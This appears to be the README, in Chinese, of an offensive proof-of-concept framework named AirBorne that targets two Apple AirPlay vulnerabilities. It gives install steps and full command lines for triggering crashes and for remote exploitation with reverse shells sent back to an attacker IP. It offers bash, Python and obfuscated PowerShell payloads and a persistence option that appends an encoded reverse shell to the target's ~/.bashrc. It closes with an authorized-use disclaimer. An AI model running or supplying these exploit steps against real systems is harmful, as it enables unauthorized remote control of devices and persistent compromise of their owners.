针对 CVE-2025-24252 与 CVE-2025-24132 的完整 PoC 框架
由 ekomsSavior 提供 |
AirBorne 是一个组合式概念验证(PoC)框架,针对 Apple AirPlay 服务中的两个严重漏洞。它包含完整的崩溃触发器和可用的反向 shell 漏洞利用,并可选持久化、监听器及多种 payload 格式——全部集成在一个脚本中。
想找原始版本?
旧版仍可在本仓库的legacy分支中找到。
查看方式:
git checkout legacy
.bashrc 注入的可选持久化(Linux)git clone https://github.com/ekomsSavior/AirBorne-PoC.git
cd AirBorne-PoC
sudo apt update
sudo apt install -y python3-scapy netcat
单个脚本 airborne.py 包含两个 PoC 及所有逻辑:
--exploit 选择 CVE--payload 设置反向 shell payload--persistent 在目标上启用持久化sudo python3 airborne.py --exploit 24252 --interface wlan0
需要一个处于监听模式(monitor mode)的接口。
使用默认 bash shell 启动完整利用:
sudo python3 airborne.py --exploit 24132 --target 192.168.1.42 --attacker 192.168.1.99
改用 Python shell:
sudo python3 airborne.py --exploit 24132 --target 192.168.1.42 --attacker 192.168.1.99 --payload python
在 Linux 目标上启用真正的持久化:
sudo python3 airborne.py --exploit 24132 --target 192.168.1.42 --attacker 192.168.1.99 --persistent
仅 shell 命令注入
sudo python3 airborne_bash_command_injector.py --exploit 24132 --target 192.168.1.42 --command "command"
| Payload | Description |
|---|---|
bash | 默认基于 TCP 的 bash 反向 shell |
python | 基于 Python 的反向 shell,使用 socket 和 pty |
powershell | 完整的 Windows PowerShell RCE payload(混淆) |
使用 --persistent 时,脚本会将编码后的反向 shell payload 追加到目标的:
~/.bashrc
这确保每次用户登录或生成终端时,你都会获得一个 shell。
base64 编码,并在缓冲区溢出后发送本项目仅用于教育、道德和授权研究目的。
未经授权利用系统是非法且不道德的。